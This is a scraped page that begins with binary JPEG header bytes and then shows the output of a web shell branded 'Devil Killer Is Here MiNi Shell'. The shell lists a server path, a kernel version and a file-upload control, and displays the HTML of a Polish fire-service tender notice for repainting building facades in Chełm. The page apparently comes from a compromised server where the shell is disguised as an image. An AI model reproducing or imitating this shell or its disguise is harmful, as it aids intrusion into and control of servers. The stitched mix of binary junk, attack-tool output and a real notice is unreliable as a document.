JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251121/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251121/0054711901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Malowanie elewacji budynków KM PSP w Chełmie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Chełmie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KM PSP w Chełmie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110200225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prymasa Stefana Wyszyńskiego 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 565 34 28</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">82 565 55 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">km_chelm@lubelskie.straz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strazchelm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Malowanie elewacji budynków KM PSP w Chełmie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ddcc521-84b6-48f3-929b-dac5fbcaed8a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00547119</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.lubelskie.straz.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji: elektronicznie na adres e-mail: km_chelm@lubelskie.straz.gov.pl lub za pośrednictwem Platformy znajdującej się pod adresem: https://przetargi.lubelskie.straz.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja miedzy Zamawiającym a<br/> Wykonawcami odbywa się przy użyciu Platformy Zamówień Publicznych ZETOPZP:<br/> https://przetargi.lubleskie.straz.gov.pl/-&gt;”JEDNOSTKI”-&gt;”KM PSP Chełm” oraz poczty<br/> elektronicznej pod adresem km_chelm@straz.lublin.pl, przy czym złożenie oferty wraz <br/> z załączonymi do oferty dokumentami może nastąpić wyłącznie za pośrednictwem<br/> Platformy Zamówień Publicznych ZETOPZP: https//przetargi.lubleskie.straz.gov.pl/-<br/> &gt;”JEDNOSTKI”-&gt;”KM PSP Chełm” <br/>Korzystanie z Platformy jest bezpłatne,<br/>4.3. Instrukcja Użytkownika – korzystania z Platformy Zamówień Publicznych ZETOPZP<br/> znajduje się na Portalu, w zakładce „Pomoc”<br/>stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 KB/s;<br/>6.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min 2 GB Ram procesor<br/> Intel IV 2GHz, jeden z systemów operacyjnych – MS Windows 10, Mac Os x 10,4, Linux<br/> lub ich nowsze wersje;<br/>6.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/> obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>6.4. włączona obsługa JavaScript;<br/>6.5. zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>6.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez<br/> wystawcę certyfikatu używanego przez Wykonawcę.<br/>dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB <br/> w formatach: .doc, .pdf, .zip, .docx, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .xades, .sig,<br/>7.2. informacje na temat kodowania i czasu odbioru danych ; - plik załączony przez<br/> Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest <br/> w systemie jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/> dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/> składania ofert;</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https//przetargi.lubleskie.straz.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem danych osobowych osób fizycznych pozyskanych w toku realizacji<br/> przedmiotowego zamówienia publicznego jest Komendant Miejski Państwowej Straży<br/> Pożarnej w Chełmie ul. Prymasa Stefana Wyszyńskiego 2B 22-100 Chełm;<br/>1.2. W Komendzie Miejskiej Państwowej Straży Pożarnej w Chełmie wyznaczony został <br/> Inspektor Ochrony Danych (20-012 Lublin ul. Strażacka 7 tel. 81 53 51 233, e-mail<br/> iod@kwpsp.lublin.pl);<br/>1.3. dane osobowe przetwarzane będą na podstawie art. 6 ust 1 lit C RODO w celu<br/> związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>1.4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/> dokumentacja postępowania w oparciu o art. 74 ust 1 i 2 ustawy z dnia 11 września<br/> 2019 r. Prawo zamówień publicznych ( t.j. Dz. U z 2022 r. poz. 1710);<br/>1.5.Dane osobowe będą przechowywane zgodnie z art. 78 ust 1 i 2 ustawy Prawo zamówień<br/> publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/> zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/> obejmuje cały czas trwania umowy;<br/>1.6. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym <br/> w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem <br/> w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/> określonych danych wynikają z ustawy Prawo zamówień publicznych;<br/>1.7. W odniesieniu do podanych danych osobowych decyzje nie będą podejmowane <br/> w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>1.8. Osoba, której dane osobowe pozyskano w toczącym się postępowaniu posiada<br/> następujące prawa:<br/>1.8.1. na podstawie art. 15 RODO prawo do dostępu do danych osobowych;<br/>1.8.2. na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/> przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. <br/> 18 ust. 2 RODO;<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/> osoba, której dane osobowe pozyskano w toczącym się postępowaniu uzna, <br/> że przetwarzanie danych osobowych dotyczących tej osoby narusza przepisy RODO;<br/><br/>1.9. Osobie, której dane osobowe pozyskano w toczącym się postępowaniu nie przysługuje:<br/>1.9.1. w związku z art. 17 ust. 3 lit b,d,lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/> osobowych, gdyż podstawa prawna przetwarzania Pani/Pana danych osobowych jest<br/> art. 6 ust. 1 lit. c RODO.<br/><br/>1.10. Odbiorcą Pani/Pana danych osobowych będzie również spółka Zakład Elektronicznej <br/> Techniki Obliczeniowej Sp. z o.o. z siedziba w Lublinie pod adresem ul. Diamentowa 2<br/> 20-447 Lublin, wpisana do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego,<br/> prowadzonego przez Sąd Rejonowy Lublin-Wschód w Lublinie z siedzibą w Świdniku<br/> VI Wydział Gospodarczy Krajowego rejestru Sądowego pod numerem KRS:<br/> 0000053608, REGON: 430248589, NIP: 7120156688, jako właściciel Platformy<br/> Zamówień Publicznych PZP https//przetargi.lubleskie.straz.gov.pl/ Na której Komenda<br/> Miejska Państwowej Straży Pożarnej w Chełmie prowadzi postępowania o udzielenie<br/> zamówienia publicznego, działająca pod adresem<br/> https//przetargi.lubleskie.straz.gov.pl/-&gt;”JEDNOSTKI”-&gt;”KM PSP Chełm”</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, będą<br/> dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone<br/> do przetwarzania takich danych są obowiązane do zachowania ich w poufności;<br/>7. zasada jawności, o której mowa w art. 71 ust 1 ustawy PZP, ma zastosowanie <br/> do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust.1<br/> RODO, zebranych w toku postępowania o udzielenie zamówienia publicznego;<br/>8. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku, <br/> gdy wniesienie żądania o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie<br/> przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/> Zamawiający nie udostępnia tych danych zawartych w protokole i załącznikach <br/> do protokołu, chyba że zachodzą przesłanki o których mowa w art. 18 ust.2 RODO;<br/>9. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania <br/> lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać integralności<br/> protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ML.2370.26.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 105691,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi remontowej polegającej w szczególności na wykonaniu mycia elewacji budynków, następnie wykonaniu napraw uszkodzeń w strukturze i w dalszej kolejności malowania w kolorystyce zgodnej z zaakceptowanym projektem. Na zakończenie prac wymieniona zostanie kompleksowo instalacja odprowadzenia wód opadowych. Całość prac, w tym kolorystyka poszczególnych elementów elewacji, poprzedzona zostanie pełną wizualizacją zamierzenia (minimum 3 ujęcia) wykonaną przez Wykonawcę i przedstawioną do akceptacji przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku badania i oceny ofert Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert, dokona wezwania do uzupełnienia oświadczeń lub dokumentów, poprawi oczywiste omyłki pisarskie, rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty z SWZ, niepowodujące istotnych zmian w treści oferty. W przypadku dokonania przez Zamawiającego poprawek w ofercie na zasadach określonych wyżej, Zamawiający niezwłocznie zawiadamia o tym, Wykonawcę, którego oferta została poprawiona.<br/>Cena jednostkowa zawiera wszystkie koszty związane z realizacją zamówienia i będzie podana w PLN z dokładnością do dwóch miejsc po przecinku<br/>Do obliczenia ceny oferty należy obliczyć wartość brutto poszczególnych pozycji zamówienia poprzez przemnożenie ilości i ceny jednostkowej netto i brutto a następnie zsumować wszystkie pozycje i otrzymaną wartość podać jako cenę oferty w formularzu ofertowym. Tak obliczona cena oferty będzie podstawiona do wzoru podanego w kryterium oceny ofert. Podać zastosowaną stawkę VAT. Prawidłowe ustalenie podatku VAT należy do obowiązków wykonawcy, zgodnie z przepisami ustawy o podatku od towarów i usług oraz podatku akcyzowym. <br/>Zastosowanie przez wykonawcę stawki podatku VAT niezgodnej z obowiązującymi przepisami, zamawiający potraktuje jako błąd w obliczeniu ceny nie podlegającej korekcie, co spowoduje odrzucenie oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 100.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty, <br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 100.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia dokumentu,<br/>w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 100.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert,<br/>2. aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>3. aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalnosci gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 114 pkt. 2 ustawy p.z.p, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 114 pkt. 3 p.z.p.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 100.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia dokumentu,<br/>w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych, <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>pełną wizualizacją zamierzenia (minimum 3 ujęcia) wykonaną przez Wykonawcę i przedstawioną do akceptacji przez Zamawiającego <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełną wizualizacją zamierzenia (minimum 3 ujęcia) wykonaną przez Wykonawcę i przedstawioną do akceptacji przez Zamawiającego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty 